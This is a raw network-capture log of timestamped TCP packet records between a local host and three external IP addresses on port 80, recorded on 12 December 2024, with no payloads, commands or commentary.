                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.980345011 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.980371952 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.980513096 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.980520010 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.980561972 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.981050014 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.981125116 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.981193066 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.982180119 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.982268095 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.982316971 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.983230114 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.983341932 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.983390093 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.984285116 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.984479904 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.984524965 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.985403061 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.985539913 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.985589981 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.986428976 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.986577034 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.986623049 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.987504959 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.987555981 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.987601042 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.988636017 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.989010096 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.989105940 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.989609003 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.989783049 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.989829063 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.990665913 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.990710974 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.990772963 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.991869926 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.991915941 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.991971970 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.992969036 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.993078947 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.993232965 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.994131088 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.994215965 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.994261980 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.995121956 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.995271921 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.995342016 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.996237993 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.996747017 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.996793985 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.997164011 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.997198105 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.997266054 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.998368025 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.998388052 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.998451948 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:40.865557909 CET8049943185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:40.865616083 CET8049943185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:40.865674973 CET4994380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:40.867331982 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:40.869188070 CET4994380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:40.987003088 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:40.987087011 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:40.987169027 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:40.988996029 CET8049943185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:41.106852055 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.310847998 CET4992680192.168.2.10185.215.113.43
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.311140060 CET4995180192.168.2.10185.215.113.43
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.321104050 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.321244001 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.321382046 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.321408987 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.321463108 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.321472883 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.321508884 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.321646929 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.321660042 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.321670055 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.321676016 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.321701050 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.321764946 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.323743105 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.430906057 CET8049951185.215.113.43192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.431020975 CET4995180192.168.2.10185.215.113.43
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.431042910 CET8049926185.215.113.43192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.431197882 CET4992680192.168.2.10185.215.113.43
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.432971954 CET4995180192.168.2.10185.215.113.43
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.441193104 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.441271067 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.441416979 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.445388079 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.494060040 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.513633966 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.513745070 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.515727043 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.517878056 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.518006086 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.518208027 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.526449919 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.529294968 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.529419899 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.529652119 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.537744045 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.537760973 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.537877083 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.546118021 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.546200991 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.546201944 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.552755117 CET8049951185.215.113.43192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.554563046 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.554658890 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.554670095 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.562921047 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.562990904 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.563009977 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.571291924 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.571342945 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.571378946 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.579679012 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.579754114 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.579772949 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.588099957 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.588112116 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.588260889 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.614293098 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.614434004 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.706041098 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.706183910 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.706727028 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.707458973 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.707537889 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.707704067 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.712791920 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.712805986 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.712929010 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.717660904 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.717839956 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.718103886 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.722800016 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.722960949 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.723084927 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.727500916 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.727611065 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.727724075 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.732394934 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.732538939 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.732672930 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.737054110 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.737067938 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.737330914 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.741520882 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.741611004 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.741837978 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.746248960 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.746330023 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.746543884 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.750952005 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.751220942 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.751389027 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.756036043 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.756206989 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.756402969 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.760569096 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.760617971 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.760731936 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.764956951 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.765000105 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.765240908 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.769548893 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.769726038 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.769855022 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.774163008 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.774344921 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.774574041 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.778896093 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.779059887 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.779181957 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.783582926 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.783633947 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.783749104 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.788163900 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.837852001 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.898665905 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.898829937 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.899046898 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.900373936 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.900558949 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.900693893 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.903805017 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.903985977 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.904123068 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.907324076 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.907411098 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.907716990 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.910746098 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.910798073 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.910917044 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.914062977 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.914170027 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.914330006 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.917366028 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.917598009 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.919734001 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.920627117 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.920737982 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.923115969 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.923927069 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.924088001 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.924217939 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.927238941 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.927305937 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.927423000 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.930493116 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.930711031 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.930814028 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.933856010 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.933999062 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.934122086 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.937117100 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.937203884 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.937336922 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.940431118 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.940499067 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.941761017 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.943674088 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.943766117 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.944350958 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.946952105 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.947084904 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.947309971 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.950241089 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.950362921 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.950457096 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.953552961 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.953666925 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.953810930 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.956854105 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.956994057 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.957139015 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.960180044 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.960278034 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.960422039 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.963517904 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.963592052 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.963727951 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.966763973 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.966886997 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.967395067 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.970199108 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.970382929 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.971692085 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.973335028 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.973432064 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.973542929 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.976691008 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.976773977 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.977317095 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.979948044 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.980108976 CET8049946185.81.68.147192.168.2.10
